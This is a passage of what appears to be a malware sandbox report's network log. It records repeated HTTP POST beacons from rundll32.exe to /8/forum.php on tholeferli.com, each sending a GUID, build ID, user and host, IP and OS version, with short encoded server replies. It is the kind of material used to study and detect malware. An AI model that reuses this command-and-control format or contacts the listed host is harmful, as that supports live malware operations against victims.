                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:36.016088963 CEST | 501 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:35 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZNMAARRABw==0


                                                Session ID: 184 | Source: 192.168.2.22:49351 | Destination: 194.147.115.74:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:36.291343927 CEST | 502 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:36.460500956 CEST | 502 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:36 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 43 58 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMCXNARRABw==0


                                                Session ID: 185 | Source: 192.168.2.22:49352 | Destination: 194.147.115.74:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:36.727144957 CEST | 503 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:36.894742012 CEST | 503 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:36 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 43 58 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMCXNARRABw==0


                                                Session ID: 186 | Source: 192.168.2.22:49353 | Destination: 194.147.115.74:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:37.342535019 CEST | 504 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:37.501259089 CEST | 504 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:37 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZZAAARRABw==0


                                                Session ID: 187 | Source: 192.168.2.22:49354 | Destination: 194.147.115.74:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:38.112885952 CEST | 505 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:38.268619061 CEST | 505 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:38 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGZATARRABw==0


                                                Session ID: 188 | Source: 192.168.2.22:49355 | Destination: 194.147.115.74:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:38.569412947 CEST | 506 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:38.741261005 CEST | 506 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:38 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTZAGARRABw==0


                                                Session ID: 189 | Source: 192.168.2.22:49356 | Destination: 194.147.115.74:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:39.036431074 CEST | 507 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:40.207247019 CEST | 507 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:40 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 48 48 53 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cHHSSARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                19 | 192.168.2.22 | 49186 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:11.662718058 CEST | 316 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:11.833951950 CEST | 317 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:11 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 51 4a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cAQJZARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                190 | 192.168.2.22 | 49357 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:40.500648022 CEST | 508 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:40.669029951 CEST | 509 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:40 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 54 47 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQTGJARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                191 | 192.168.2.22 | 49358 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:40.945125103 CEST | 509 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:41.113933086 CEST | 510 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:40 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 56 45 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZVEAARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                192 | 192.168.2.22 | 49359 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:41.403152943 CEST | 510 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:41.561014891 CEST | 511 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:41 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 4e 4d 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cANMZARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                193 | 192.168.2.22 | 49360 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:41.838561058 CEST | 512 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:41.995012045 CEST | 512 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:41 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 59 42 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJYBQARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                194 | 192.168.2.22 | 49361 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:42.266980886 CEST | 513 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:42.422451019 CEST | 513 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:42 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTHSGARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                195 | 192.168.2.22 | 49362 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:42.708059072 CEST | 514 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:42.866810083 CEST | 514 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:42 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 59 42 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQYBJARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                196 | 192.168.2.22 | 49363 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:43.142509937 CEST | 515 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:43.311347008 CEST | 515 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:43 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 48 53 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQHSJARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                197 | 192.168.2.22 | 49364 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:43.592484951 CEST | 516 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:43.759109974 CEST | 516 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:43 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 43 42 59 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cCBYXARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                198 | 192.168.2.22 | 49365 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:44.030925989 CEST | 517 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:44.500493050 CEST | 518 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:44 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 43 42 59 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cCBYXARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                199 | 192.168.2.22 | 49366 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:44.782286882 CEST | 518 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:45.254894972 CEST | 519 | IN | HTTP/1.1 200 OK
